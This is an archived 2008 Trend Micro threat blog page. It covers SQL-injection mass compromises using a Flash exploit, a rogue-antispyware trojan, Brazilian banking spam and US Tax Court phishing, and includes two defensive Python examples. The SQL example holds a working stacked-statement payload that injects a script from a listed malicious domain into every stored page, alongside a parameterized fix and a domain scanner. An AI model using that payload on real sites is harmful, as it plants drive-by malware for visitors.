
Archive for May, 2008


May 28
by Jake Soriano (Technical Communications)

Another mass compromise through SQL injection, yet again. The "yet agains" and "anothers" keep coming. This time, unlike its predecessors, which relied on relatively old, known (and patched) exploits, the attack introduces a new kid on the block: what looks like a zero-day exploit for a previously unknown vulnerability in Adobe Flash Player, which lets attackers install malware on affected PCs.

This one already has a good deal of history behind it. Mass compromises are the month of May's major story. TrendLabs has seen them hit Web sites everywhere from a large part of Asia (see here and here) to Italian-language sites, with only days between one incident and the next (beyond the links above, more information can be found in our blog).

Certain legitimate sites were found injected with scripts that silently lead browsers to sites hosting exploits for the Flash vulnerability (or vulnerabilities). When the required system conditions are met and exploitation succeeds, the PC downloads and executes malware detected as TROJ_WIESSY.J and WORM_OTWYCAL.BO.

TrendLabs detects the injected script as HTML_DLDR.BF and the .SWF files as SWF_DLOADER.YVM and SWF_DLOADER.YVN. SWF_DLOADER.YVM downloads further files detected as SWF_DLOADER.YVN; SWF_DLOADER.YVN in turn exploits the vulnerability "Integer Overflow in Adobe Flash Player Allows Remote Arbitrary Code Execution" to download files initially detected as TSPY_UPACK.D and TROJ_DROPPER.NAK. The downloaded files have since changed and are now detected as TROJ_WIESSY.J and WORM_OTWYCAL.BO.

Remarkably, the domains involved in this attack spoof the domain name of a legitimate, well-known telecommunications corporation and that of a popular online game. Other domains are lkjrc and woai117 (both, unsurprisingly, under .cn).

Trend Micro Web Threat Protection (WTP) already blocks access to the malicious domains involved in this attack.

Our engineers are analyzing this attack further. Updates will be posted as soon as more information becomes available. As of this writing, we are still seeing several new malicious domains that are hosting .SWF files exploiting the Adobe Flash Player bug.

Updated as of May 29, 2008, 4:00am PST

 

May 26
by Michael Tants (Threats Analyst)

While filtering URLs from emails gathered by an email honeypot, we came across messages containing URLs that point to a file named "video.exe". We took this as a fairly obvious hint of malicious activity, so we decided to get our hands dirty and do some digging. Here is a screenshot of a sample mail:

The URL behind the "Watch" hyperlink is a redirect made by doubleclick.net, an advertising service. It appears the file was removed from its original server, so the advertising service now redirects to other Web sites that also host VIDEO.EXE. Trend Micro detects the file as TROJ_NUWAR.ZJ.

So far we have seen two Web sites that appear to have been compromised to host the malicious file: hxxp://infopointitalia.it and hxxp://escortsmurcia.com. Note that merely visiting these sites does not trigger infection; appending the filename VIDEO.EXE to the URL, however, will lead to trouble (readers are warned that doing so may result in malware infection). The owners of both sites have been informed, and as of this writing the malicious file has been removed from hxxp://escortmurcia.com.

TROJ_NUWAR.ZJ installs itself as a service on the affected system and hooks the browser with a malicious BHO (browser helper object). Through the BHO it downloads a text file containing several URLs of porn and advertising Web sites. It also writes words related to adult, pharmacy and finance Web content into text files found on the affected system.

The trouble does not end there. When the user restarts the browser or the affected system, several annoying "spyware warning" symptoms start to appear:

  • The browser opens with a file named C:\Windows\index.html instead of the home page URL; the page it shows advertises an antispyware product.
  • A warning appears on screen claiming that the system is being infiltrated and prompting the user to install an antispyware application. A "Windows Security Center Warning" also appears on the taskbar, telling the user that the computer is running slowly because of malware activity. Here is a screenshot of these warnings:
  • Another warning is shown through Internet Explorer, using an image styled after Windows Security Center messages, telling the user that a possible spyware infection has been detected:
  • The desktop background is changed to an alarmingly colored image, meant to rattle the user:
  • Task Manager is disabled by the malware, preventing the user from terminating the malware process. When the user gets desperate and finally downloads the "AntiSpySpider" software to fix the problem, the system turns out to be still infected.
  • Searching for "AntiSpySpider" on Google confirms that it is indeed a rogue antispyware program.
  • Additionally, the initial redirect by the advertising server also appears to connect to another URL, hxxp://{BLOCKED}front.net/l.php?id=119. That URL leads to the download of a runtime-encrypted Windows executable. Varying the id at the end of the URL yields several other files that differ in content but are the same size, and that trigger the heuristic detection TROJ_TIBS.JHT.

All files involved have been submitted to TrendLabs for detection.

This article is based on joint research with Alice Decker.

     
Posted in Malicious Sites, Malware |

May 23
    by Macky Cruz (Technical Communications)

A few hours ago we discovered a spam run in Brazil that uses a Trend Micro address in its From field:


Figure 1. Sample of the Brazilian spam, first seen by our honeypots on the evening of May 22.

Our support team in the Latin American region has observed some 6,000 samples of this spam since it was first identified. The blast seems to be tapering off to roughly 15 samples a minute, according to one of our analysts in the region.

Translated, it reads as follows (grammar lapses intact):

Subject: you may loose all your information as well as your e-mail


Our servers have detected a security failure in your email account. for more security without the loose of data or vulnerabilities on your email box we remind you to active your mailbox


or you will loose all your information as well as your email

to activate your mailbox is very easy

1 click on the link below
2 you will see a window with the button execute press execute
3 after that click on the button open and you will be redirected to your activated mailbox
4 write your complete email - full name - city - state - zip.

[link] Activate your email mailbox

remember that you have only from 12 to 24 hour To activate your mailbox
otherwise our system will block your E-mail account.

to obtain more information you can get in touch with our services team through our E-mail
[email address]

This "security failure," ironically, is exactly what happens when the recipient falls for the ruse and clicks the link to "activate" his or her inbox.

The link actually leads to hxxp://{BLOCKED}security.bravehost.com/protecao.exe (where hxxp stands for http). Protecao.exe is detected as TROJ_BANLOAD.FAF. Its main purpose is to connect to another URL in the same domain and download a file named plugin-security.exe. (It also accesses another URL that is inaccessible as of this writing.)

This 3MB file is spyware detected by our patterns as TSPY_BANKER.OIZ, a bank-account information stealer. Note that clicking the link in the spam brings up a dialog asking whether to Open, Run or Save the file; once the user accepts the file, the downloader fetches the spyware without informing the user.

We advise Latin American users to be especially wary of this attack. Users are often more inclined to trust an email written in their native language, but in this case that trust is exactly what the targeted social engineering exploits, and such threatening mail should, as always, be deleted immediately. Note that Trend Micro will NEVER send email such as this.

Legitimate communications typically come with the proper headings, company logos and language. Another tell-tale sign that this email is not legitimate is that the link points directly to an executable.

Trend Micro users, for their part, need not worry: our Web Threat Protection technology cuts off infection by detecting the attack-related files and blocking the malicious URLs, and our antispam definitions already filter this threat.

What should a customer do on receiving an unexpected or suspicious email that seems to come from Trend Micro? The best course is to contact your local support representative or account manager to verify its legitimacy.

Thanks to Threats Analyst Jose Lopez Tello for alerting us to this attack.

     
Posted in Malicious Sites, Malware, Spam |

May 23
    by Jovi Umawing (Technical Communications)

The Content Security (CS) team of TrendLabs has come across a new spear phishing incident reminiscent of the whale phishing incident documented last April, in which bogus subpoenas were sent to CEOs.

The new spam run involves email messages sent to specific organizations as notices of deficiency or tax petitions supposedly coming from the United States Tax Court (see Figure 1).

Spammed Email

Figure 1: Sample screenshot of the spammed spear phishing email

Once members of a targeted organization click the link in the message body, they are directed to www.ustax-courts.com, the purported US Tax Court site, and asked to download a newer version of Internet Explorer (IE) in order to view the court details (see Figure 2). A small change to the real domain name (here, inserting a hyphen) is enough to convince unwary users that the bogus site is legitimate, making them all the more likely to click.

The legitimate US Tax Court site is www.ustaxcourt.gov.

Bogus Web site

Figure 2: Sample screenshot of the bogus US Tax Court Web site

Trend Micro advises users to be cautious when reading email and warns against automatically clicking links in such messages. As we have advised before, consult a lawyer if an important-looking legal email might be valid. In this case, though, the Court itself has stated that it does not send email notices to parties with cases before it:

US Tax Court Notice to users
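Both this post and the Brazilian spam post above turn on tells that can be checked mechanically before anyone clicks: a link that points straight at an executable, a link whose domain has nothing to do with the claimed sender, a free-hosting subdomain, and a domain that is one hyphen away from the real one. The Python below is an added example written for this page, not code from the original posts or from a Trend Micro product. It scores a (From header, link) pair against a small, constructed policy: the legitimate-domain list, the classification of bravehost.com as a free-hosting provider, the sender addresses, the subdomain standing in for the {BLOCKED} part of the URL, and the link paths are all assumptions made for the example.

```python
import re
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed policy for the example. Domains that mail may legitimately link to,
# and a provider treated as free hosting (bravehost.com is named in the post;
# calling it free hosting is an assumption for this example).
LEGITIMATE_DOMAINS = ("ustaxcourt.gov", "trendmicro.com")
FREE_HOSTING_DOMAINS = ("bravehost.com",)
EXECUTABLE_EXTENSIONS = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd")


def registered_domain(host):
    """Crude registrable-domain extraction: the last two labels (enough here)."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character domain tweaks."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(host):
    """Legitimate domain that host imitates, or None if it is genuine or unrelated.

    The second-level label is compared after stripping hyphens and digits, and one
    remaining edit is tolerated, so 'ustax-courts.com' maps to 'ustaxcourt.gov'
    while 'ustaxcourt.gov' itself is left alone.
    """
    reg = registered_domain(host)
    if reg in LEGITIMATE_DOMAINS:
        return None
    label = re.sub(r"[-\d]", "", reg.split(".")[0])
    for legit in LEGITIMATE_DOMAINS:
        if edit_distance(label, legit.split(".")[0]) <= 1:
            return legit
    return None


def triage_link(from_header, url):
    """Return the indicators that fire for a (From header, link) pair; [] means clean."""
    reasons = []
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if parsed.path.lower().endswith(EXECUTABLE_EXTENSIONS):
        reasons.append("link points directly at an executable")
    sender = parseaddr(from_header)[1]
    sender_domain = sender.rpartition("@")[2].lower()
    if sender_domain and registered_domain(host) != registered_domain(sender_domain):
        reasons.append("link domain does not match the sender's domain")
    if registered_domain(host) in FREE_HOSTING_DOMAINS:
        reasons.append("link is hosted on a free-hosting provider")
    target = lookalike_of(host)
    if target:
        reasons.append("link host imitates " + target)
    return reasons


# Constructed samples modelled on the two posts. The sender local parts, the
# subdomain standing in for the {BLOCKED} part of the URL, and the paths are made up.
SAMPLES = [
    ('"Trend Micro" <suporte@trendmicro.com>',
     "http://somesecurity.bravehost.com/protecao.exe"),
    ("notices@ustax-courts.com", "http://www.ustax-courts.com/petition"),
    ("newsletter@trendmicro.com", "http://www.trendmicro.com/en/about"),
]

if __name__ == "__main__":
    for sender, link in SAMPLES:
        print(link, "->", triage_link(sender, link) or ["no indicators"])
```

The registrable-domain helper deliberately takes only the last two labels; a real deployment would use the public suffix list, since "example.co.uk" would otherwise collapse to "co.uk". The lookalike check is the piece that catches this post's trick: the hyphen and trailing "s" in ustax-courts.com disappear under the normalization and the single remaining edit is tolerated, while the genuine ustaxcourt.gov is excluded before any comparison runs.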

     

May 22
    by Macky Cruz (Technical Communications)

TrendLabs has received reports that several Web sites in Japan, including a popular music download site and a music company's site, have been found injected with malicious code.

As we have been learning over the past few days, getting hacked is becoming a sadly more frequent, but no less dangerous, threat for Web site owners. More importantly, users browsing these compromised sites are put in harm's way, as the attackers inject this code in order to plant backdoors and spyware on users' PCs.

Analysis by our engineers shows that these compromises are related to the previously reported mass SQL injection attacks. Three distinct malicious domains have been identified, all of which lead to the download of malicious files onto the affected system.

They are the following:

• nihaorr1(dot)com
• bluell(dot)cn
• 9i5t(dot)cn

We call them "known malicious domains" because we have already seen them in the attacks we blogged about here and here. The reach of these attacks is evidently growing, which suggests that an automated tool is being used to seek out vulnerable sites that can then be hijacked to redirect users. The scarier implication: no weakly coded site is safe.

These domains, needless to say, have already been blocked by our Web Threat Protection technology, one of them as early as April 24, when it was first seen in these malicious stunts. Trend Micro users are thus protected from this attack. Other users are advised to be careful when surfing and to make sure their endpoint security products and security patches are up to date.
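What makes these compromises "mass" is that the injection does not target the page a visitor happens to be viewing; it targets the site's database, so the script tag ends up stored in content and is served on every page, which is also why the same three domains keep turning up across unrelated sites. The same mechanism is behind the Flash-exploit compromises in the May 28 post above. The Python below is an added example written for this page, not code from TrendLabs or from the attackers. It pairs a string-concatenated UPDATE (sqlite3's executescript() stands in for a database driver that runs stacked statements, a detail the post does not discuss) with the parameterized version, then scans the stored pages for script tags pointing at the three domains listed above. The CMS table, the view-counter query and the payload are constructed for the example.

```python
import re
import sqlite3
from urllib.parse import urlparse

# The three domains this post names as already seen in the mass SQL-injection attacks.
KNOWN_MALICIOUS_DOMAINS = ("nihaorr1.com", "bluell.cn", "9i5t.cn")

# Matches the src attribute of <script src=...> tags, quoted or unquoted.
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)


def is_known_bad(host):
    """True if host is one of the listed domains or a subdomain of one."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in KNOWN_MALICIOUS_DOMAINS)


def flag_known_bad_scripts(html):
    """Sorted list of <script src> hosts in html that point at a listed domain."""
    hosts = set()
    for url in SCRIPT_SRC.findall(html):
        host = urlparse(url).hostname
        if host and is_known_bad(host):
            hosts.add(host.lower())
    return sorted(hosts)


def build_db():
    """Constructed in-memory page store standing in for a site's CMS database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT,
                            views INTEGER NOT NULL DEFAULT 0);
        INSERT INTO pages (id, title, body) VALUES (1, 'News',  '<p>Welcome</p>');
        INSERT INTO pages (id, title, body) VALUES (2, 'Music', '<p>Downloads</p>');
    """)
    return conn


# Hypothetical request parameter shaped like the attacks described in the post: it
# closes the intended UPDATE and appends a second statement that tacks a remote
# script onto every stored page body, so every page on the site starts serving it.
PAYLOAD = ("1; UPDATE pages SET body = body || "
           "'<script src=http://nihaorr1.com/1.js></script>'")


def record_view_vulnerable(conn, page_id):
    """Vulnerable: the request parameter is spliced into the SQL text.

    executescript() stands in for drivers that execute stacked statements;
    sqlite3's execute() happens to reject the second statement, but that is the
    driver protecting the code, not the code protecting itself.
    """
    conn.executescript("UPDATE pages SET views = views + 1 WHERE id = " + page_id)


def record_view_safe(conn, page_id):
    """Hardened: the value is bound as a parameter and can never become SQL.

    Returns the number of rows updated; a non-numeric page_id matches nothing.
    """
    cur = conn.execute("UPDATE pages SET views = views + 1 WHERE id = ?", (page_id,))
    return cur.rowcount


def scan_site(conn):
    """Map page id -> known-bad script hosts, for every page whose body carries one."""
    findings = {}
    for page_id, body in conn.execute("SELECT id, body FROM pages ORDER BY id"):
        hits = flag_known_bad_scripts(body)
        if hits:
            findings[page_id] = hits
    return findings


def demo():
    """Run the payload through both versions; returns (vulnerable findings,
    rows touched by the safe version, safe findings)."""
    conn = build_db()
    record_view_vulnerable(conn, PAYLOAD)
    vulnerable_findings = scan_site(conn)

    conn = build_db()
    touched = record_view_safe(conn, PAYLOAD)
    return vulnerable_findings, touched, scan_site(conn)


if __name__ == "__main__":
    bad, touched, safe = demo()
    print("concatenated SQL :", bad)   # every page now carries the script
    print("parameterized SQL:", touched, "rows updated,", safe)
```

The scanner is the part worth keeping even where the code is already parameterized: running it over the page store, or over fetched copies of a site's own pages, is a cheap way to notice that a site has been hijacked before visitors do, and extending the domain list is a one-line change.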

     
Posted in Malicious Sites |


© Copyright 2008 Trend Micro Inc. All rights reserved.